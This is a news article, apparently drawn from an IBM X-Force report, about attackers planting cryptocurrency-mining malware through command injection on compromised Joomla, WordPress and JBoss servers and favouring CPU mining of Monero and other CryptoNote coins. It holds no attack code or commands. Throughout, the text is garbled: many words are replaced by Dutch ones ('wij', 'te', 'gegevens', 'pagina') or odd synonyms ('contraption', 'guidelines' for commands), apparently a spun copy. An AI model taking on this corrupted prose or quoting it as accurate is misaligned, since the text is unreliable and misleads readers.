With an enlargening success and profitability of cryptocurrency, criminals have also commenced to concentrate their efforts on manhandling the largely untraceable currency. If the last two years are any indication, cybercriminals have attempted to attack both sides of the financial world, however, thanks to the inherent privacy that cryptocurrency offers, it is becoming a center of the latest campaigns.
While wij reported a number of attacks that focused on cryptocurrency (mostly Ethereum te this wave) earlier this summer, attackers aren’t only looking at emptying out online wallets. They are also focusing their efforts on recruiting machines for mining. A latest research report from IBM X-Force that the team collective with Wccftech ahead of its publication exposes that there has bot a “steep increase” te the number of mining instruments used te cyberattacks. The malware containing cryptocurrency coin-mining instruments have evidently commenced to concentrate more on the enterprise networks and CPU mining.
“According to IBM Managed Security Services (MSS) gegevens, there have bot peaks reaching more than a sixfold increase te attacks involving embedded mining contraptions te the eight-month period inbetween January and August 2018.”
This goes after an earlier report by security researchers at GuardiCore, who had exposed that a botnet made up of compromised Windows Server machines wasgoed being used for ransomware, gegevens exfiltration, and mining Monero cryptocurrency.
One coin miner contraption to rule all the cryptocurrencies?
Ter the latest research, IBM X-Force said that they spotted the same mining device used by attackers that had the capability to mine several different coins. Hidden within fake photo files, hosted on compromised web servers running Joomla or WordPress, or stored on compromised JBoss Application Servers, the attackers attempted to mine several different currencies, including Monero (XMR).
The victim – mostly from a set of targeted industries – would need to visit the compromised pagina for the attack to be launched. They could also be attacked using malicious email attachments or linksaf.
“Command injection (CMDi) attacks, detected by IBM Security’s managed intrusion detection and prevention system (IDPS) service during the attacks were attempting to plant the malicious photos on victims’ machines using WGET and CURL shell guidelines when victims simply visited the pagina via a verbinding ter an email or through visiting a compromised webpagina,” the security researchers wrote.
IBM researchers noted two possible scripts of how the attack wasgoed launched:
- The attackers scanned for already compromised CMS and then conducted the CMDi (Guideline injection) attack.
- Cybercriminals performed both the initial compromise of the web resource and the subsequent CMDi attack.
Concentrate on a few industries
While it is unclear why the attackers have focused on a few industries, the research exposes that manufacturing and financial services were the most targeted, followed by dokter and entertainment, information and communication technology, and retail.
Ter an email to Wccftech, IBM’s security researchers noted that thesis “percentages indicate attacks on users ter those industries, not necessarily the websites wielded by those industries.” They added that “in this particular case, wij’re measuring attempted attacks that could have bot delivered by phishing emails, watering slot attacks, or simply visiting a compromised webpagina that wasgoed previously trusted.”
Why CPU coin miner?
Cryptocurrency mining has affected both the pricing and availability of GPUs. While GPUs have large numbers of arithmetic logic units (ALUs) compared to CPUs that permits them to do large amounts of bulky mathematical labor ter a greater quantity than CPUs, it may not always be the best choice for an attacker.
Researchers believe that attackers get a larger playing field with more endpoints to enslave when compared to “optional” GPUs. “The CryptoNight mining algorithm employed by CryptoNote-based currency is designed for mining on CPUs and can be efficiently tasked to billions of existing devices (any modern x86 CPU),” the researchers added. They further said that a capability known spil wise mining permits CPU mining on the user’s rekentuig “without centralization of mining farms and pool mining.”
If you are wondering what currencies attackers are mining, the list includes mostly CryptoNote-based virtual currencies, including:
- ByteCoin (BCN)
- Boolberry (BBR)
- Dashcoin (DSH)
- DigitalNote (XDN)
- DarkNetCoin (DNC)
- Fantomcoin (FCN)
- Monero (XMR)
- Pebblecoin (XPB)
- Quazarcoin (QCN)
- Anonymous Electronic On-line Coin (AEON)
“Our findings did display the potential for Monero to be slightly more profitable than mining for the more popular bitcoin (BTC), for example, making it perhaps more attractive to attackers,” researchers noted. “This may be the reason for the hop ter volume of attacks utilizing this type of mining contraption.”